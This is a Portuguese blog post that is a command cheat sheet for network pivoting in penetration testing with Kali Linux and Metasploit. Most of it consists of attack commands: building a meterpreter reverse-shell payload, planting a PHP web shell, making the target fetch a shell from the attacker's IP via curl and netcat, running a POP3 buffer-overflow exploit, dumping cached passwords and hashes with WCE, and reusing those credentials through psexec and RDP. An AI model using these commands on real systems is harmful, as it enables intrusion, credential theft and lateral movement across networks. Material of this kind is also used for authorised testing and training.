PIVOTING – PENETRATION TESTING – KALILINUX

Visão geral

Pivoting refere-se à prática de cortar um computador em rede ou um servidor e, em seguida, usando esse host para atacar outros sistemas de computador dentro da rede. Ao lançar ataques de dentro da rede, o atacante ignora política de firewall e pode executar ataques que não seriam possíveis de fora da rede. Ao utilizar um sistema comprometido para lançar ataques a partir de, o atacante tem uma melhor perspectiva de permanecer despercebido e pode deixar menos de uma impressão digital.

Ferramentas

msfconsole -: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
msfvenom -: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
netcat -: https://nmap.org/ncat/
curl -: http://curl.haxx.se/
socks4a -: https://www.rapid7.com/db/modules/auxiliary/server/socks4a
proxychains -: https://github.com/rofl0r/proxychains-ng
nmap -: https://nmap.org/
seattlelab_pass -: https://www.rapid7.com/db/modules/exploit/windows/pop3/seattlelab_pass
wce-universal -: http://www.ampliasecurity.com/research/wcefaq.html
psexec -: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
xfreerdp -: https://github.com/FreeRDP/FreeRDP

Falha joomla

Exploiting CVE-2015-8562 (A New Joomla! RCE)

PDF
Penetration Testing with Kali Linux -:
Tunneling Pivoting Web Application Penetration Testing -:

Obs:
Abra as porta no seu modem,

Comandos

Criando shell com msfvenom
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=porta -f elf > output

Enviando uma shell via netcat com shell.php
$ nc -lvp PORTA < shell
$ curl –silent http://target.com/shell.php?cmd=nc%20SEU_IP%20PORTA%20%3e%20shell
source shell.php <?php system($_GET[‘cmd’]); ?>

Iniciando postgresql
/etc/init.d/postgresql start

Iniciando msfconsole para receber conexao
$ msfconsole -r resource.rc -q
code resource.rc
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST SEU_IP
set LPORT PORTA
set ExitOnSession false
exploit -j -z

Conectando uma sessão
msf > sessions -i numero da sessão

Ver e a adicionar rotas
meterpreter > route
meterpreter > run autoroute -s subnet/24
meterpreter > run autoroute -p

Execulatndo socks4a
meterpreter > background
msf > use auxiliary/server/socks4a
msf > run

Editando proxychains.conf
$ nano/etc/proxychains.conf
edit  a ultima linha para  socks4  127.0.0.1 1080

Visualizar portas forwards
$ netstat -nlpt

Fazendo um scanner com proxychains e nmap na subnet
$ proxychains nmap -v -sT -Pn subnet/24

Habilitando forward para porta filtradas
use uma sessão
meterpreter > portfwd add -l LOCAL_PORTA -p PORTA_FILTRADA -r IP_TARGET

Usando exploit para SMAIL com Buffer Overflow
msf > use exploit/windows/pop3/seattlelab_pass
msf > set RHOST IP_TARGET
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LPORT PORTA
msf > set LHOST SEU_IP
msf >  exploit

Upando wce para um servidor windows
use um sessão em um windows
meterpreter > upload /usr/shere/wce/wce-universal.exe c:\

Execulatdo o WCE para pegar hash ou senhas em cache
meterpreter > shell
cd \
# wce-universal.exe -w -: para senhas em cache
# wce-universal.exe -: para hashs

Usando exploit psexec para uso de credenciais
msf > use exploit/windows/smb/psexec
msf > set RHOST IP_TARGET
msf > set SMBPass
msf > set SMBUser
msf > set SMBDomain
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST SEU_IP
msf > set LPORT PORTA
exploit

Usado xFreeRDP
xfreerdp /v:IP_TARGET /u:username /p:password /d:domain /w:800 /h:600

 

By Moisés Oliver

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s